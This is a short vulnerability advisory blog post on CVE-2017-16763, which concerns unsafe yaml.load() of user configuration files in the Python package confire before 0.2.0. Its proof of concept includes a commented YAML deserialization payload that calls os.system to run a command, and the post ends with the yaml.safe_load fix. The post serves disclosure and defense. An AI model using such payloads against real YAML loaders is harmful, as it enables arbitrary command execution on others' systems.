---
layout: post
title: "CVE-2017-16763: configure loaded through Confire"
date: 2017-11-12 21:31:33 +0800
comments: true
categories: vulnerability
---


<font size="4">**Python Package:**　　[confire](https://pypi.python.org/pypi/confire/)  </font>

<font size="4"> **Version:**　　　　　 Before 0.2.0  </font>

<font size="4"> **Published:**　　　　Nov. 10th. 2017  </font>

<font size="4"> **Reported by:** 　　　　　 Joel  </font>

<font size="4"> **CVE-2017-16763** 　　　[CVE_details](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16763)</font>


## Overview

`Confire` is a simple but powerful configuration scheme that builds on the configuration parsers of Scapy, elasticsearch, Django and others. Due to the user specific configuration was loaded from `~/.confire.yaml`
usinig `yaml.load()`, an issue was discovered in the `Confire` package before `0.2.0`.Untrusted data passed into the `confire.yaml` files can execute arbitrary python commands resulting in command execution.



## POC

```
class MyConfig(Configuration):
	mysetting = True
	logpath   = "/var/log/myapp.log"
	appname   = "MyApp"
settings = MyConfig.load()
#CONF_PATHS = [
#'/etc/confire.yaml',                    # The global configuration
#os.path.expanduser('~/.confire.yaml'),  # User specific configuration
#os.path.abspath('conf/confire.yaml')    # Local directory configuration
#    ]
#'~/.confire.yaml':!!python/object/apply:os.system ["calc.exe"]


```
## Remediation

The updated versions of `confire` correctly use the `yaml.safe_load` method which prevents remote code execution.
